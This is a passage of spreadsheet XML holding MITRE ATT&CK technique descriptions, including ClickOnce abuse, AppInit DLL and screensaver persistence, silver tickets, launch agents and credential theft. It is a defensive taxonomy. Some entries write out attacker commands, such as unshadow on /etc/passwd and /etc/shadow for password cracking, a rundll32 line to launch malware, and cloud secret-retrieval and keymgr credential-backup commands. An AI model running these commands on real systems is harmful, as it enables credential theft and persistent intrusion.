ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
https://attack.mitre.org/techniques/T1127/002</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
https://attack.mitre.org/techniques/T1059/006</t>
  </si>
  <si>
    <t>T1070.010</t>
  </si>
  <si>
    <t>Relocate Malware</t>
  </si>
  <si>
    <t>Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
https://attack.mitre.org/techniques/T1070/010</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>Identify Roles</t>
  </si>
  <si>
    <t>Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
https://attack.mitre.org/techniques/T1591/004</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>Data Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
https://attack.mitre.org/techniques/T1132</t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppInit_DLLs&lt;/code&gt; value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)
Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. 
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)
https://attack.mitre.org/techniques/T1546/010</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) 
Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
https://attack.mitre.org/techniques/T1598</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
Resource hijacking may take a number of different forms. For example, adversaries may:
* Leverage compute resources in order to mine cryptocurrency
* Sell network bandwidth to proxy networks
* Generate SMS traffic for profit
* Abuse cloud-based messaging services to send large quantities of spam messages
In some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)
https://attack.mitre.org/techniques/T1496</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)
https://attack.mitre.org/techniques/T1585</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)
https://attack.mitre.org/techniques/T1588</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;, and &lt;code&gt;C:\Windows\sysWOW64\&lt;/code&gt;  on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:
* &lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
* &lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
* &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
* &lt;code&gt;ScreenSaveTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)
https://attack.mitre.org/techniques/T1546/002</t>
  </si>
  <si>
    <t>T1556.009</t>
  </si>
  <si>
    <t>Conditional Access Policies</t>
  </si>
  <si>
    <t>Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. 
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.
https://attack.mitre.org/techniques/T1556/009</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>Create Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.
https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>T1555.006</t>
  </si>
  <si>
    <t>Cloud Secrets Management Stores</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.  
Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.  
If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004) or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as `get-secret-value` in AWS, `gcloud secrets describe` in GCP, and `az key vault secret show` in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)
**Note:** this technique is distinct from [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005) in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.
https://attack.mitre.org/techniques/T1555/006</t>
  </si>
  <si>
    <t>T1213.003</t>
  </si>
  <si>
    <t>Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
https://attack.mitre.org/techniques/T1213/003</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
https://attack.mitre.org/techniques/T1565/002</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;~/Library/LaunchAgents&lt;/code&gt;.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the &lt;code&gt;Label&lt;/code&gt;, &lt;code&gt;ProgramArguments &lt;/code&gt;, and &lt;code&gt;RunAtLoad&lt;/code&gt; keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.
 Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the &lt;code&gt;RunAtLoad&lt;/code&gt; or &lt;code&gt;KeepAlive&lt;/code&gt; keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X)
https://attack.mitre.org/techniques/T1543/001</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.
https://attack.mitre.org/techniques/T1569</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
https://attack.mitre.org/techniques/T1059/003</t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (&lt;code&gt;/proc/[pid]&lt;/code&gt;) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) 
Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/009</t>
  </si>
  <si>
    <t>T1650</t>
  </si>
  <si>
    <t>Acquire Access</t>
  </si>
  <si>
    <t>Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)
Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)
By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)
In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).
**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1650</t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence.
https://attack.mitre.org/techniques/T1601/001</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).
https://attack.mitre.org/techniques/T1558/002</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, such as Credential Access, Lateral Movement, or Defense Evasion, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)). 
The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)) 
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
* Contact or other sensitive information about business partners and customers, including personally identifiable information (PII) 
Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include the following:
* Storage services such as IaaS databases, enterprise databases, and more specialized platforms such as customer relationship management (CRM) databases 
* Collaboration platforms such as SharePoint, Confluence, and code repositories
* Messaging platforms such as Slack and Microsoft Teams 
In some cases, information repositories have been improperly secured, typically by unintentionally allowing for overly-broad access by all users or even public access to unauthenticated users. This is particularly common with cloud-native or cloud-hosted services, such as AWS Relational Database Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)
https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>T1070.009</t>
  </si>
  <si>
    <t>Clear Persistence</t>
  </si>
  <si>
    <t>Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)
https://attack.mitre.org/techniques/T1070/009</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>Windows Credential Manager</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.
Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named &lt;code&gt;Policy.vpol&lt;/code&gt;, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)
Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. &lt;code&gt;vaultcmd.exe&lt;/code&gt; is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as &lt;code&gt;CredEnumerateA&lt;/code&gt;, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running &lt;code&gt;rundll32.exe keymgr.dll KRShowKeyMgr&lt;/code&gt; then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.
Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)
https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>T1036.010</t>
  </si>
  <si>
    <t>Masquerade Account Name</t>
  </si>
  <si>
